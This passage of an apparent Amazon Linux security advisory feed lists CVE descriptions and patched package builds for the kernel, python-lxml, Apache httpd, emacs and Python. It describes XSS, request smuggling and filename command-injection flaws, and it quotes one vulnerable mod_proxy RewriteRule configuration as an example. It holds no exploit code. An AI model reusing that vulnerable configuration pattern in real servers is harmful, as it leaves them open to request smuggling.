Guests can trigger deadlock in Linux netback driver T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] The patch for XSA-392 introduced another issue which might result in a deadlock when trying to free the SKB of a packet dropped due to the XSA-392 handling (CVE-2022-42328). Additionally when dropping packages for other reasons the same deadlock could occur in case of netpoll being active for the interface the xen-netback driver is connected to (CVE-2022-42329).
CVE-2022-42328:
Guests can trigger deadlock in Linux netback driver T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] The patch for XSA-392 introduced another issue which might result in a deadlock when trying to free the SKB of a packet dropped due to the XSA-392 handling (CVE-2022-42328). Additionally when dropping packages for other reasons the same deadlock could occur in case of netpoll being active for the interface the xen-netback driver is connected to (CVE-2022-42329).
CVE-2022-3643:
Guests can trigger NIC interface reset/abort/crash via netback It is possible for a guest to trigger a NIC interface reset/abort/crash in a Linux based network backend by sending certain kinds of packets. It appears to be an (unwritten?) assumption in the rest of the Linux network stack that packet protocol headers are all contained within the linear section of the SKB and some NICs behave badly if this is not the case. This has been reported to occur with Cisco (enic) and Broadcom NetXtrem II BCM5780 (bnx2x) though it may be an issue with other NICs/drivers as well. In case the frontend is sending requests with split headers, netback will forward those violating above mentioned assumption to the networking core, resulting in said misbehavior.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3643" title="" id="CVE-2022-3643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42328" title="" id="CVE-2022-42328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42329" title="" id="CVE-2022-42329" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48956" title="" id="CVE-2022-48956" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48988" title="" id="CVE-2022-48988" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48991" title="" id="CVE-2022-48991" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49015" title="" id="CVE-2022-49015" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49753" title="" id="CVE-2022-49753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0045" title="" id="CVE-2023-0045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0394" title="" id="CVE-2023-0394" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0459" title="" id="CVE-2023-0459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0461" title="" id="CVE-2023-0461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1073" title="" id="CVE-2023-1073" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.305-155.531.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1707</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1707: important priority package update for kernel</title><issued date="2023-03-17 15:53:00" /><updated date="2024-06-07 05:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-26607:
In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c.
CVE-2022-3524:
A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function ipv6_renew_options of the component IPv6 Handler. The manipulation leads to memory leak. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211021 was assigned to this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3524" title="" id="CVE-2022-3524" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26607" title="" id="CVE-2023-26607" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.301-153.528.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1709</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1709: important priority package update for python-lxml</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-43818:
There's a flaw in python-lxml's HTML Cleaner component, which is responsible for sanitizing HTML and Javascript. An attacker who is able to submit a crafted payload to a web service using python-lxml's HTML Cleaner may be able to trigger script execution in clients such as web browsers. This can occur because the HTML Cleaner did not remove scripts within SVG images in data URLs such as <img src=>. XSS can result in impacts to the integrity and availability of the web page, as well as a potential impact to data confidentiality in some circumstances.
CVE-2020-27783:
A Cross-site Scripting (XSS) vulnerability was found in the python-lxml's clean module. The module's parser did not properly imitate browsers, causing different behaviors between the sanitizer and the user's page. This flaw allows a remote attacker to run arbitrary HTML/JS code. The highest threat from this vulnerability is to confidentiality and integrity.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27783" title="" id="CVE-2020-27783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43818" title="" id="CVE-2021-43818" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-lxml-debuginfo" version="3.2.1" release="4.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-lxml-debuginfo-3.2.1-4.10.amzn1.x86_64.rpm</filename></package><package name="python26-lxml" version="3.2.1" release="4.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-lxml-3.2.1-4.10.amzn1.x86_64.rpm</filename></package><package name="python27-lxml" version="3.2.1" release="4.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-lxml-3.2.1-4.10.amzn1.x86_64.rpm</filename></package><package name="python26-lxml-docs" version="3.2.1" release="4.10.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-lxml-docs-3.2.1-4.10.amzn1.noarch.rpm</filename></package><package name="python27-lxml-docs" version="3.2.1" release="4.10.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-lxml-docs-3.2.1-4.10.amzn1.noarch.rpm</filename></package><package name="python-lxml-debuginfo" version="3.2.1" release="4.10.amzn1" epoch="0" arch="i686"><filename>Packages/python-lxml-debuginfo-3.2.1-4.10.amzn1.i686.rpm</filename></package><package name="python26-lxml" version="3.2.1" release="4.10.amzn1" epoch="0" arch="i686"><filename>Packages/python26-lxml-3.2.1-4.10.amzn1.i686.rpm</filename></package><package name="python27-lxml" version="3.2.1" release="4.10.amzn1" epoch="0" arch="i686"><filename>Packages/python27-lxml-3.2.1-4.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1711</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1711: important priority package update for httpd24</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-27522:
HTTP Response Smuggling vulnerability in Apache HTTP Server via mod_proxy_uwsgi. This issue affects Apache HTTP Server: from 2.4.30 through 2.4.55. Special characters in the origin response header can truncate/split the response forwarded to the client.
CVE-2023-25690:
Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution. For example, something like: RewriteEngine on RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P] ProxyPassReverse /here/ http://example.com:8080/ Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.
CVE-2022-37436:
Prior to Apache HTTP Server 2.4.55, a malicious backend can cause the response headers to be truncated early, resulting in some headers being incorporated into the response body. If the later headers have any security purpose, they will not be interpreted by the client.
CVE-2022-36760:
Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.54 and prior versions.
CVE-2006-20001:
A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash. This issue affects Apache HTTP Server 2.4.54 and earlier.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-20001" title="" id="CVE-2006-20001" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36760" title="" id="CVE-2022-36760" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37436" title="" id="CVE-2022-37436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25690" title="" id="CVE-2023-25690" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27522" title="" id="CVE-2023-27522" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_session" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.56" release="1.100.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.56" release="1.100.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.56" release="1.100.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.56-1.100.amzn1.noarch.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.56" release="1.100.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.56" release="1.100.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.56-1.100.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1712</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1712: important priority package update for emacs</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:25:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48339:
An issue was discovered in GNU Emacs through 28.2. htmlfontify.el has a command injection vulnerability. In the hfy-istext-command function, the parameter file and parameter srcdir come from external input, and parameters are not escaped. If a file name or directory name contains shell metacharacters, code may be executed.
CVE-2022-48337:
GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the etags program. For example, a victim may use the "etags -u *" command (suggested in the etags documentation) in a situation where the current working directory has contents that depend on untrusted input.
CVE-2022-45939:
GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags *" command (suggested in the ctags documentation) in a situation where the current working directory has contents that depend on untrusted input.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45939" title="" id="CVE-2022-45939" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48337" title="" id="CVE-2022-48337" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48339" title="" id="CVE-2022-48339" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="emacs-debuginfo" version="24.3" release="20.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-debuginfo-24.3-20.25.amzn1.x86_64.rpm</filename></package><package name="emacs" version="24.3" release="20.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-24.3-20.25.amzn1.x86_64.rpm</filename></package><package name="emacs-common" version="24.3" release="20.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-common-24.3-20.25.amzn1.x86_64.rpm</filename></package><package name="emacs-el" version="24.3" release="20.25.amzn1" epoch="1" arch="noarch"><filename>Packages/emacs-el-24.3-20.25.amzn1.noarch.rpm</filename></package><package name="emacs" version="24.3" release="20.25.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-24.3-20.25.amzn1.i686.rpm</filename></package><package name="emacs-common" version="24.3" release="20.25.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-common-24.3-20.25.amzn1.i686.rpm</filename></package><package name="emacs-debuginfo" version="24.3" release="20.25.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-debuginfo-24.3-20.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1713</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1713: important priority package update for python27</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-24329:
An issue in the urllib.parse component of Python before v3.11 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.
CVE-2022-45061:
An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45061" title="" id="CVE-2022-45061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24329" title="" id="CVE-2023-24329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-libs" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.145.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.145.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.145.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.145.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.145.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.145.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1714</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1714: important priority package update for python38</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-24329:
An issue in the urllib.parse component of Python before v3.11 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.
CVE-2022-45061:
An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45061" title="" id="CVE-2022-45061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24329" title="" id="CVE-2023-24329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python38-debuginfo" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debuginfo-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-libs-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-devel-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debug-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-tools-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-test-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debuginfo-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-tools-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-libs-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-devel-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-test-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debug-3.8.5-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1715</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1715: important priority package update for microcode_ctl</title><issued date="2023-03-30 22:50:00" /><updated date="2024-02-14 20:03:00" /><severity>important</severity><description>Package updates are available for 